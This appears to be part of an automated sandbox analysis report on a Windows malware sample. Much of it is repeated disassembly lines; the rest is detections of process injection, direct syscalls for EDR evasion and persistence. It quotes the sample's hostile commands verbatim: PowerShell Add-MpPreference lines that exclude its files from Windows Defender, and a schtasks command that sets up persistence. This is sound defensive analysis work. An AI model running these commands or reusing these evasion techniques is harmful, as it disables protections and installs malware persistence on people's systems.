Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108D530 mov eax, dword ptr fs:[00000030h]	9_2_0108D530
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107E53E mov eax, dword ptr fs:[00000030h]	9_2_0107E53E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107E53E mov eax, dword ptr fs:[00000030h]	9_2_0107E53E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107E53E mov eax, dword ptr fs:[00000030h]	9_2_0107E53E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107E53E mov eax, dword ptr fs:[00000030h]	9_2_0107E53E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107E53E mov eax, dword ptr fs:[00000030h]	9_2_0107E53E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0110B52F mov eax, dword ptr fs:[00000030h]	9_2_0110B52F
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01058550 mov eax, dword ptr fs:[00000030h]	9_2_01058550
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01058550 mov eax, dword ptr fs:[00000030h]	9_2_01058550
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108656A mov eax, dword ptr fs:[00000030h]	9_2_0108656A
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108656A mov eax, dword ptr fs:[00000030h]	9_2_0108656A
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108656A mov eax, dword ptr fs:[00000030h]	9_2_0108656A
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104B562 mov eax, dword ptr fs:[00000030h]	9_2_0104B562
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108B570 mov eax, dword ptr fs:[00000030h]	9_2_0108B570
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108B570 mov eax, dword ptr fs:[00000030h]	9_2_0108B570
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01084588 mov eax, dword ptr fs:[00000030h]	9_2_01084588
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01052582 mov eax, dword ptr fs:[00000030h]	9_2_01052582
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01052582 mov ecx, dword ptr fs:[00000030h]	9_2_01052582
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104758F mov eax, dword ptr fs:[00000030h]	9_2_0104758F
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104758F mov eax, dword ptr fs:[00000030h]	9_2_0104758F
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104758F mov eax, dword ptr fs:[00000030h]	9_2_0104758F
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108E59C mov eax, dword ptr fs:[00000030h]	9_2_0108E59C
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010DB594 mov eax, dword ptr fs:[00000030h]	9_2_010DB594
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010DB594 mov eax, dword ptr fs:[00000030h]	9_2_010DB594
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D05A7 mov eax, dword ptr fs:[00000030h]	9_2_010D05A7
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D05A7 mov eax, dword ptr fs:[00000030h]	9_2_010D05A7
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D05A7 mov eax, dword ptr fs:[00000030h]	9_2_010D05A7
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0110F5BE mov eax, dword ptr fs:[00000030h]	9_2_0110F5BE
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010715A9 mov eax, dword ptr fs:[00000030h]	9_2_010715A9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010715A9 mov eax, dword ptr fs:[00000030h]	9_2_010715A9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010715A9 mov eax, dword ptr fs:[00000030h]	9_2_010715A9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010715A9 mov eax, dword ptr fs:[00000030h]	9_2_010715A9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010715A9 mov eax, dword ptr fs:[00000030h]	9_2_010715A9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E35BA mov eax, dword ptr fs:[00000030h]	9_2_010E35BA
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E35BA mov eax, dword ptr fs:[00000030h]	9_2_010E35BA
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E35BA mov eax, dword ptr fs:[00000030h]	9_2_010E35BA
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E35BA mov eax, dword ptr fs:[00000030h]	9_2_010E35BA
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010745B1 mov eax, dword ptr fs:[00000030h]	9_2_010745B1
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010745B1 mov eax, dword ptr fs:[00000030h]	9_2_010745B1
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107F5B0 mov eax, dword ptr fs:[00000030h]	9_2_0107F5B0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107F5B0 mov eax, dword ptr fs:[00000030h]	9_2_0107F5B0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107F5B0 mov eax, dword ptr fs:[00000030h]	9_2_0107F5B0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107F5B0 mov eax, dword ptr fs:[00000030h]	9_2_0107F5B0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107F5B0 mov eax, dword ptr fs:[00000030h]	9_2_0107F5B0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107F5B0 mov eax, dword ptr fs:[00000030h]	9_2_0107F5B0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107F5B0 mov eax, dword ptr fs:[00000030h]	9_2_0107F5B0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107F5B0 mov eax, dword ptr fs:[00000030h]	9_2_0107F5B0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107F5B0 mov eax, dword ptr fs:[00000030h]	9_2_0107F5B0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011235D7 mov eax, dword ptr fs:[00000030h]	9_2_011235D7
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011235D7 mov eax, dword ptr fs:[00000030h]	9_2_011235D7
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011235D7 mov eax, dword ptr fs:[00000030h]	9_2_011235D7
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108E5CF mov eax, dword ptr fs:[00000030h]	9_2_0108E5CF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108E5CF mov eax, dword ptr fs:[00000030h]	9_2_0108E5CF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010855C0 mov eax, dword ptr fs:[00000030h]	9_2_010855C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010565D0 mov eax, dword ptr fs:[00000030h]	9_2_010565D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108A5D0 mov eax, dword ptr fs:[00000030h]	9_2_0108A5D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108A5D0 mov eax, dword ptr fs:[00000030h]	9_2_0108A5D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011255C9 mov eax, dword ptr fs:[00000030h]	9_2_011255C9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010CD5D0 mov eax, dword ptr fs:[00000030h]	9_2_010CD5D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010CD5D0 mov ecx, dword ptr fs:[00000030h]	9_2_010CD5D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010795DA mov eax, dword ptr fs:[00000030h]	9_2_010795DA
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0107E5E7
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0107E5E7
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0107E5E7
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0107E5E7
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0107E5E7
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0107E5E7
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0107E5E7
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107E5E7 mov eax, dword ptr fs:[00000030h]	9_2_0107E5E7
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108C5ED mov eax, dword ptr fs:[00000030h]	9_2_0108C5ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108C5ED mov eax, dword ptr fs:[00000030h]	9_2_0108C5ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010525E0 mov eax, dword ptr fs:[00000030h]	9_2_010525E0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010715F4 mov eax, dword ptr fs:[00000030h]	9_2_010715F4
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010715F4 mov eax, dword ptr fs:[00000030h]	9_2_010715F4
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010715F4 mov eax, dword ptr fs:[00000030h]	9_2_010715F4
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010715F4 mov eax, dword ptr fs:[00000030h]	9_2_010715F4
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010715F4 mov eax, dword ptr fs:[00000030h]	9_2_010715F4
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010715F4 mov eax, dword ptr fs:[00000030h]	9_2_010715F4
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107340D mov eax, dword ptr fs:[00000030h]	9_2_0107340D
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01088402 mov eax, dword ptr fs:[00000030h]	9_2_01088402
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01088402 mov eax, dword ptr fs:[00000030h]	9_2_01088402
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01088402 mov eax, dword ptr fs:[00000030h]	9_2_01088402
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D7410 mov eax, dword ptr fs:[00000030h]	9_2_010D7410
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104C427 mov eax, dword ptr fs:[00000030h]	9_2_0104C427
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104E420 mov eax, dword ptr fs:[00000030h]	9_2_0104E420
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104E420 mov eax, dword ptr fs:[00000030h]	9_2_0104E420
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104E420 mov eax, dword ptr fs:[00000030h]	9_2_0104E420
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D6420 mov eax, dword ptr fs:[00000030h]	9_2_010D6420
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D6420 mov eax, dword ptr fs:[00000030h]	9_2_010D6420
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D6420 mov eax, dword ptr fs:[00000030h]	9_2_010D6420
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D6420 mov eax, dword ptr fs:[00000030h]	9_2_010D6420
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D6420 mov eax, dword ptr fs:[00000030h]	9_2_010D6420
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D6420 mov eax, dword ptr fs:[00000030h]	9_2_010D6420
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D6420 mov eax, dword ptr fs:[00000030h]	9_2_010D6420
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108A430 mov eax, dword ptr fs:[00000030h]	9_2_0108A430
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0110F453 mov eax, dword ptr fs:[00000030h]	9_2_0110F453
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105B440 mov eax, dword ptr fs:[00000030h]	9_2_0105B440
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105B440 mov eax, dword ptr fs:[00000030h]	9_2_0105B440
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105B440 mov eax, dword ptr fs:[00000030h]	9_2_0105B440
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105B440 mov eax, dword ptr fs:[00000030h]	9_2_0105B440
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105B440 mov eax, dword ptr fs:[00000030h]	9_2_0105B440
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105B440 mov eax, dword ptr fs:[00000030h]	9_2_0105B440
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108E443 mov eax, dword ptr fs:[00000030h]	9_2_0108E443
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108E443 mov eax, dword ptr fs:[00000030h]	9_2_0108E443
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108E443 mov eax, dword ptr fs:[00000030h]	9_2_0108E443
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108E443 mov eax, dword ptr fs:[00000030h]	9_2_0108E443
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108E443 mov eax, dword ptr fs:[00000030h]	9_2_0108E443
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108E443 mov eax, dword ptr fs:[00000030h]	9_2_0108E443
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108E443 mov eax, dword ptr fs:[00000030h]	9_2_0108E443
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108E443 mov eax, dword ptr fs:[00000030h]	9_2_0108E443

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zE1VxVoZ3W.exe"
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zE1VxVoZ3W.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtCreateMutant: Direct from: 0x774635CC
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtWriteVirtualMemory: Direct from: 0x77462E3C	Jump to behavior
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtMapViewOfSection: Direct from: 0x77462D1C
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtResumeThread: Direct from: 0x774636AC
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtProtectVirtualMemory: Direct from: 0x77462F9C
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtSetInformationProcess: Direct from: 0x77462C5C
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtProtectVirtualMemory: Direct from: 0x77457B2E
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtNotifyChangeKey: Direct from: 0x77463C2C
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtAllocateVirtualMemory: Direct from: 0x77462BFC
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtQueryInformationProcess: Direct from: 0x77462C26
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtResumeThread: Direct from: 0x77462FBC	Jump to behavior
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtReadFile: Direct from: 0x77462ADC	Jump to behavior
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtQuerySystemInformation: Direct from: 0x77462DFC
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtDelayExecution: Direct from: 0x77462DDC
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtAllocateVirtualMemory: Direct from: 0x77463C9C
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtCreateUserProcess: Direct from: 0x7746371C	Jump to behavior
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtWriteVirtualMemory: Direct from: 0x7746490C	Jump to behavior
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtAllocateVirtualMemory: Direct from: 0x774648EC	Jump to behavior
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtQuerySystemInformation: Direct from: 0x774648CC
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtQueryVolumeInformationFile: Direct from: 0x77462F2C	Jump to behavior
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtReadVirtualMemory: Direct from: 0x77462E8C	Jump to behavior
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtCreateKey: Direct from: 0x77462C6C
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtSetInformationThread: Direct from: 0x77462B4C
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtQueryAttributesFile: Direct from: 0x77462E6C
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtDeviceIoControlFile: Direct from: 0x77462AEC
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtOpenSection: Direct from: 0x77462E0C
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtCreateFile: Direct from: 0x77462FEC
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtOpenFile: Direct from: 0x77462DCC
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtSetInformationThread: Direct from: 0x77462ECC
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtQueryInformationToken: Direct from: 0x77462CAC
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtAllocateVirtualMemory: Direct from: 0x77462BEC
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	NtOpenKeyEx: Direct from: 0x77462B9C

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Memory written: C:\Users\user\Desktop\zE1VxVoZ3W.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Memory written: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: NULL target: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Section loaded: NULL target: C:\Windows\SysWOW64\winver.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: NULL target: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe protection: read write
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: NULL target: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\winver.exe

Thread register set: target process: 3232

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\winver.exe

Thread APC queued: target process: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zE1VxVoZ3W.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp7D49.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Process created: C:\Users\user\Desktop\zE1VxVoZ3W.exe "C:\Users\user\Desktop\zE1VxVoZ3W.exe"	Jump to behavior
